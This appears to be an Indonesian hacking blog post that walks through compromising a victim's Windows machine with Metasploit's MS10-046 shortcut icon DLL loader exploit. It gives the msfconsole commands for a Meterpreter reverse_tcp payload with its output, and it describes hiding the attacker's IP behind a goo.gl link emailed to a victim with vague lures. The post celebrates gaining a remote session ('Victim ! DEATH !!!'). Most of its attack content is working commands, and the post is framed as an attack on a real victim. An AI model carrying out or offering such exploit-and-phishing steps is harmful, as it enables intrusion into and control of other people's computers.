Exploit ShortCut_Icon_DLL-Loader + [Video]

Apa yang harus kita jawab ketika victim bertanya :
"Mengapa saya harus menuju alamat IP anda (Attacker)"

yah, kita tidak dapat menjawab pertanyaan yang begitu simple dari victim,
namun ada beberapa usaha dalam melakukan exploitasi untuk meyakinkan victim agar menuju ke IP si attacker.
dalam exploitasi kali ini saya tidak menggunakan MITM untuk memancing attacker.

Equipments:
1. msfconsole =>>  Run a Exploitation
2. goo.gl =>>  URL Shortener
3. alpine =>>  Send File to Victim

Planning Example
Saya melihat ada victim yg sedang mengaktifkan Email ==> kemudian saya mengirim file DLLloader kepada victim ==> dengan iming-iming yang tidak jelas saya membuat victim yakin agar mengklik url yg sudah kita shortener ==> saat victim membuka url tersebut, kita mendapatkan session meterpreter, Victim ! DEATH !!!

First Step

Run Exploit:

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.10:4444 
[*] Send vulnerable clients to \\192.168.1.10\bUmmY\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.10:80/
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Server started.


Ingat ! jangan menutup jendela metasploit diatas. krn kita akan memerlukannya nanti.

Selanjutnya saya menggunakan URL Shortener untuk menutupi URL IP saya yg nantinya akan dikirim ke Email victim agar di eksekusi oleh victim.

IP-Address saya adalah : 192.168.1.10 [sesuaikan dgn ip-address anda]
kemudian saya membuka http://goo.gl/ untuk melakukan Shortener Url.



terlihat diatas bahwa hasil Shortener url dari IP-Address saya adalah http://goo.gl/5jAuY

Selanjutnya saya mengirim Url tersebut dengan menggunakan Alpine


Sending Success,
sekarang mari kita lihat apa yg dilakukan victim saat melihat pesan yang saya kirim.


selanjutnya victim membuka URL tersebut :)
lihat apa yang terjadi :

tidak terjadi apa di komputer victim, melainkan hanya dua buah file ShortCut dan Dll =))

sekarang kita kembali ke Metasploit.


YEAH... Kita berhasil mendapatkan session meterpreter.


Victim. Death =))

Video :




Author By:
Hidemichi-Hiroyuki a.k.a [H2]



Comments

Popular posts from this blog

Decrypt MD5 $Wordpress

Exploit Samba "SmbClient"

Configure Pure-FTP on Kali Linux